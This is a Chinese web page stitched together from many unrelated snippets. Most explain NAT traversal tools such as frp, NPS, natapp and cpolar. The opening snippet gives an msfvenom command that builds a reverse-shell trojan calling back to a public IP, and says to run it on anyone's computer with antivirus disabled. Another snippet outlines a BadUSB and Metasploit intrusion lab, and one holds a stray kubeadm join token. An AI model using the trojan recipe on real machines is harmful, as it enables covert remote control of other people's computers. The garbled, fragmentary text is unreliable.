前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。 (这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=101.43.1.181 LPORT=8000 -f exe -o backdoor.exe -o选择文件名,ip地址选择外网服务器的地址 端口选择8000 下载到桌面 我这里用xshell windows/meterpreter/reverse_tcp 设置IP和端口 然后我们生成就好,放到任意谁的电脑上,但是要关杀软,因为我们没加免杀,Windows自带的检测也要关闭 运行后成功外网上线
看着这个标题我我自己都有点懵,大概意思就是用自己家的电脑架设一个传奇服务端,然后用FRP内网穿透可以在外网玩,标题写的有点纠结,就这样吧。 请先准备工具: 1.电脑(能上网的那种); 2.服务器1台(自己玩1M宽带即可,很多人玩就自己看着办); 3.一个支持frp内网穿透的路由器(好像有软件也可以支持,没试过); 4.好像没了(一个脑子༼ ∗ •̀ (oo) •́ ∗ ༽) 开始搞事情 先在服务器上面安装frp内网穿透:Frp内网穿透Frp一键安装脚本及设置教程 然后就在路由器设置和服务器没啥太大的关系了。 只需要在路由器配置三个端口就能外网访问: 1.登陆网关:7000 2.角色网关:7100 3.游戏网关:7200(如果开放两个游戏网关还得加上7300) 配置代码在下面 配置好后登陆frps dashboard 下面是在外网访问的效果:(图片大让它加载一会会儿) 也可以体验下爱游架设的,就我和盆友偶尔玩玩,服务器就2M的带宽 下载信息 资源名称:资源名称:外网测试 应用平台:应用平台:windows 资源版本
今天先说一下最重要的问题:如何通过内外穿透让外网访问到树莓派上的服务? 从网站建好以后,试过两种内网穿透方式,花生壳、NPS。 其他的还有FRP、ngrok等 花生壳内网穿透 花生壳我一直没舍得在上面花钱,因为有免费试用的基本能够满足需求。但是免费的才是最贵的。免费账号服务不稳定,经常掉线。 NPS服务 后来在网上找到了NPS服务,nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。 但nps有个最大的问题就是:需要一台外网能访问到的服务器来架设nps服务。有人说你都有外网的服务器了还要内网穿透干什么呢? ssh连接 当然我的网站其实是放在外网服务器的,示例的网站只是自己有个域名随便玩的。最主要的用处是能够随时随地通过ssh控制家里的树莓派。
需要在同一个局域网访问你的电脑本机地址才可以,那么就存在一个业务场景,比如测试或者别的同事你的老板想看效果,但是不在同一局域网,你因为没有完全实现结束,不可能直接发布到服务器上给他们看,所以这个时候需要进行外网访问你的本机运行的服务 解决什么问题 外网访问你本地运行的前端项目 使用工具 natApp 实现过程 下载natApp 申请一个免费的 - 申请结束 配置启动服务 新建一个文件夹,存放下载好的natApp,比如下面我的地址 /natapp -authtoken=【填写隧道中你申请的authToken】 存在的问题 如果前端使用了内网穿透的地址,那么请求后台地址的地址也需要进行内网穿透才可以,否则很大概率会跨域! 后台配置内网穿透过程如上!
上一篇的记录: 记录 | 通过WireGuard实现异地组网在此基础上,我需要把家中部署在内网环境中的Web服务穿透至外网以供其他人正常使用为什么不把服务直接部署在公网环境中? 部署一开始,我想将WAF部署在我的大带宽国内服务器中,但由于国内机房默认封堵80/443端口,需要域名获得工信部ICP备案才能够开放对应端口,因此我选择将WAF部署在一个流量包较大的香港地域服务器服务器3中 使用Docker部署雷池防火墙使用容器(Docker)快速部署雷池防火墙雷池防火墙WAF系统环境的要求操作系统:LinuxCPU 指令架构:x86_64CPU 指令架构:支持 ssse3 指令集软件依赖 # 确认 CPU 是否支持 ssse3 指令集docker version # 查看 Docker 版本docker compose version ,点击进入点击右上角的添加站点,以我的某服务后端为例,服务端口在5500,部署在分配地址为172.20.20.23的服务器上,即填入上游服务器地址为:http://172.20.20.23:5500,外网访问端口为
使用NPS进行内网穿透——实现远程访问外部网络电脑 参考文档:https://ehang-io.github.io/nps/#/? id=nps 内网穿透搭建教程 NPS简介和实现原理 1、NPS简介 2、NPS实现功能 3、nps特点 二、使用NPS安装前期准备 1、 提前下载好nps压缩包 2、购买云服务器并查询其公网IP地址 3、下载并安装好远程连接工具 三、内网穿透步骤流程操作 【1】服务端配置 1、远程连接云服务器。 3、在非内网环境下使用内网dns,或者需要通过udp访问内网机器等---- udp代理模式 4、在外网使用HTTP代理访问内网站点---- http代理模式 5、搭建一个内网穿透ss,在外网如同使用内网 三、内网穿透步骤流程操作 【1】服务端配置 1、远程连接云服务器。
今天介绍一款内网穿透工具,让我们在没有公网IP的情况下快速部署并访问内网web、ftp和远程服务器等需求,操作步骤简单易懂,主要是简单,其次还是简单。 3、以公网登录软路由系统和ssh远程linux服务器为例。 二、操作步骤: 1、登录padavan软路由-扩展功能-内网穿透-ddnsto-启用ddnsto功能。 3、将复制的令牌信息拷贝到ddnsto Token中并应用本页设置。 4、官网ddnsto控制台登录-我的设备-直接F5刷新就能看到一台“未命名设备”,这就说明和你的老毛子软路由器系统连接成功了。 总结: 经过实际测试,ddnsto内网穿透工具确实比ftp、ngrok和向日葵内网版等部署简单方便多了。
2、打通内外网 简单来说,内网穿透就像给你的内网设备开了一扇“可以让外网访问的门”。 3、远程访问场景 具体来说以下这些场景都可以用内网穿透解决远程访问难题: 远程办公:远程连接公司电脑、查看资料、访问内网系统 NAS异地访问:在外网访问家中群晖、绿联、飞牛OS等NAS设备 视频监控:异地实时查看家中 在众多内网穿透工具中, 通常其安装与配置过程极为简便,即使是不懂网络知识也能轻松上手。以大众化内网穿透工具nat123为示例,核心步骤只需简单的3步操作,即可完成内网设备与外网的无缝连接。 3. 使用花生壳进行内网穿透 花生壳是一款非常老牌的内网穿透软件,它提供了多种版本供用户选择,包括电脑、手机、路由器等。 由于开放的全端口映射模式,和丰富且可自定义的外网域名端口使用,是目前较为大众化主流多人使用方法之一。用户只需要在内网机器上启动服务,并进行相应的配置,即可实现内网穿透到外网远程访问。
使用内网穿透技术,我们可以方便快捷地进行文件传输,而无需将文件上传到云端再下载。 3. 三、内网穿透:实现步骤详解下面,我们将详细介绍实现通用的内网穿透的具体步骤,让你在无公网IP网络下,也能快速轻松将内网IP端口转换成自定义域名端口,实现内网穿透外网访问。 ,能够直接绑定自定义域名端口让外网访问实现。 通常情况下,在工具上添加映射设置内外网地址确认保存后,会自动建立一个隧道或端口映射记录,将外部网络中的请求精准转发到内网服务器上,并将响应结果返回给外部网络,内外网传输关系即时生效。 (3)跨平台和跨网络不同平台和网络环境下都可以使用内网穿透技术进行访问和管理。无论是在办公室、家庭或其他外部网络环境下,都可以通过公网访问内网服务,实现互联互通。
对于开发人员来说,如果每次都将项目部署到公网的服务器,才可以实现外网访问,这样太麻烦了。 所以我每次都是做内网穿透来实现外网访问,以本地电脑做服务器,将内网端口映射到公网,生成公网地址来访问,比较简单。 内网穿透工具,我采用的是cpolar内网穿透,支持http/https/tcp协议,不限制流量,也不需要公网IP,不用进入到路由器设置,可以永久免费使用。 安装cpolar内网穿透工具 cpolar内网穿透官网:https://www.cpolar.com/ 需要先注册一个cpolar账号,后面会用到。 3. 获取公网地址 点击左侧仪表盘的状态————在线隧道列表,找到我们刚刚创建的隧道,可以看到有生成相应的公网URL地址,有两行,其中一个是http隧道,一个是https隧道。
将内网机器的127.0.0.1的8882端口,通过主动连接外网的122.114.250.153的ssh,映射到外网vps的122.114.250.153的7280端口,实现网络穿透.这样访问122.114.250.153 注意ssh只能够将内网的端口转发到外网,不能够动态的自动内网代理.如果你需要通过互联网代理直接穿透到内网,一般来说有两个方法: 如果你可以在内网的机器上创建一个透明代理端口且可以内网机器使用ssh: 在内网机器可以建立一个透明代理 (如Tinyproxy)8882端口,然后再将这个8882端口映射到外网vps的7280.本地浏览器直接将代理服务器设置为122.114.250.153:7280就可以访问到内网的资源了. 注意,如果和外网通信的内网机器的ip地址改变,会导致整条通道断开。 这时候autossh还在后台运行,重新链接需要重新进行建立一条通道,需要在内网机器上杀死autossh进程,然后外网杀掉7280端口。
内网穿透,就是把内网的服务,比如WEB服务、SQL服务、自己搭建的各类服务穿透到你的云服务器上,这样别人访问你的云服务器就等于访问你的内网服务器。 内网穿透的软件有很多,我目前用得多的是FRP内网穿透软件.下面就来讲解使用内网穿透发布SQL服务到云服务器上。 1 FRP软件 根据对应的操作系统及架构,下载最新版本的程序。 3 内网服务器上新建frpc.ini文件(注意#与后面的内容要删除) # frps.ini [common] server_addr = x.x.x.x server_port = 1000 [SQL local_ip = 192.168.3.48 #内网服务器ip local_port = 1433 #SQL端口号,按实际填写 remote_port = 1560 #暴露给外网访问的端口号 现在的云服务器特别便宜,秒杀99元/一年的,303元/3年了,可比自己建个服务器划算多了,还有80,443端口可以用,现在算下来,电费都不止99元了,点击链接就可以直达秒杀现场。
文章目录 转载自远程内网穿透的文章:【Python】快速简单搭建HTTP服务器并公网访问「cpolar内网穿透」 1.前言 Python作为热度比较高的编程语言,其语法简单且语句清晰,而且python 再转入打算共享的文件夹 cd test 接着输入命令启动http服务 如果Python版本为2.x,输入命令 python -m SimpleHTTPServer 8081 如果Python版本为3. 不过,不能在公共互联网访问的网页总觉得缺少灵魂,因此我们可以借助cpolar内网穿透,创建一条内网穿透数据隧道,让我们可以在公共互联网条件下,访问到python。 3.cpolar的安装和注册 同样的,我们可以在cpolar的官网(https://www.cpolar.com/)找到对应操作系统版本的软件,笔者这里也是选择Windows版本。 笔者并不想每天进行重置数据隧道设置,因此将cpolar升级至vip版,以便能获得能长期稳定存在的内网穿透数据隧道。
我们就要做内网穿透了,内网穿透就是别人通过外网能够访问到我们本地的服务器。 常用场景:外网访问本地搭建的网站服务、本地资源等(外网访问环境调试、内网资源获取、小程序调试) 穿透工具 入门简易度 价格 速度及稳定性 Ngrok 简单 免费/付费(几元每月) 慢(国外线路) Natapp 免费版本:提供http,https,tcp全隧道穿透,随机域名/TCP端口,不定时强制更换域名/端口,自定义本地端口。收费版本也就几元每月。 免费版本:提供http,https,tcp全隧道穿透,随机域名/TCP端口,不定时强制更换域名/端口,自定义本地端口。收费版本也就几元每月。 综合对比下这几个简单的内网穿透,推荐使用natapp或者NatBao。
www.yourdomain.com [common] bind_port = 7000 //与frpc通讯端口,vps上必须开端口 vhost_http_port = 8080 //外网访问端口 http //可改为https,则vhost_http_port改为vhost_https_port custom_domains = www.yourdomain.com //外网帮顶的域名 /frps.ini 3、修改客户端 frpc.ini 文件,设置 frps 所在的服务器的 IP 为 x.x.x.x,local_port 为本地机器上 web 服务对应的端口: [common] server_addr = x.x.x.x //外网vps的ip server_port = 7000 //服务器端的配置文件中的bind_port auth_token = 123
无论是远程办公需要访问公司内网服务器,还是在家中查看监控画面,外网访问内网设备都变得愈发重要。个别环境有动态公网Ip的,是可以利用 DDNS 动态域名解析是实现这一需求的有效方式。 但对于大多数个人家庭网络和普通一般公司带宽都是无公网IP网络,较为便捷且成本控制的方案就是借助内网穿透域名访问来实现。 本文将深入内网穿透技术应用操作教程,介绍实用的实现工具Cloudflare Tunnel 内网穿透部署文档(Windows + 自定义域名)适用于在 Windows 系统下,使用 Cloudflare 3.这种内网穿透cf方式速度在国内访问并不算快的,胜在免费和自定义域名访问。有条件的建议自己公网主机搭建内网穿透服务,当然,更推荐公网直连。 4.内网穿透技术应用能轻松穿透各种复杂的路由器和防火墙,让外网设备通过域名快速访问到内网应用。
EasyNTS是网络穿透组网设备,由于外网不能直接访问内网,所以如果EasyNTS穿透的是内网下服务web端口,可以直接把穿透结果复制粘贴到网页,将内网ip和端口传出来得到穿透结果,通过穿透结果就可以实现外网访问内网 但是我们的研发支持人员在进行此项设置的时候,发现复制的穿透结果并没有复制成功。 EasyNTS无法复制穿透结果 EasyNTS的穿透列表中,点击穿透结果前的复制按钮,显示复制成功,但是实际上却没有复制成功,这个复制按钮偶尔会有失灵情况发生。 ?
一时好奇,于是尝试模拟一次社工,利用VMware搭建了3层网络靶场,通过BadUSB+MSF的攻击手段,一步一步渗透到第三层网络。 我们可以利用VMware搭建出3层网络的网络环境,首先在虚拟机中新建3块网卡,并选择仅主机模式: ? 同理,将第二层靶机win2003设为双网卡vmnet2和vmnet3: ? 最后,将第三层靶机linux的网络设为vmnet3: ? 至此,我们本次试验的3层网络靶场已经搭建完毕,攻击者的kali只能访问第一层网络,而无法访问第二层和第三层的靶机: ? 至此,我们通过BadUSB让第一层网络中的win7系统下载并运行我们的恶意软件,然后通过MSF利用MS17-010、口令爆破、web渗透等方式穿透三层内网,最终拿下第三层网络系统的权限。
net.bridge.bridge-nf-call-iptables = 1 EOF sysctl --system kubeadm join 172.19.1.193:6443 --token vg3uyn .37zies0xxm3bgm9r --discovery-token-ca-cert-hash sha256:109645b4faaae35e16b68a448ef69d7bb9cdb03a832adfb4e04875d0f071cef8
3,找到【远程桌面】,先打开启用远程桌面开关,如是多用户的可以按需点击选择可远程访问这台电脑的用户。4,如果没有可以访问的用户,点击【添加】,添加完用户后,点击【确定】。 3,点击【系统】进入子页面。4,在系统的侧边栏可以看到【远程设置】,点击进去。5,在【远程设置】里,选择允许远程连接到此计算机,然后点击确定。 3,如果外网地址是使用自己域名的,保存映射后,还需要在自己注册域名解析网站上添加对应的cname指向让自己域名生效,不然会一直提示域名指向不对。 三,外网电脑设置:直接远程桌面到目标跨网的主机1,使用微软自带远程连接 开始菜单 → 运行 → mstsc。2,输入nat123内网映射设置好的外网域名地址和外网端口,点击连接。 3,输入目标内网计算机的账户和密码,这里注意密码不能为空,所以内网电脑必须设置密码,外网才能连接,输入账户和密码后,点击确定就完成了,这样你就可以直接访问远程桌面了!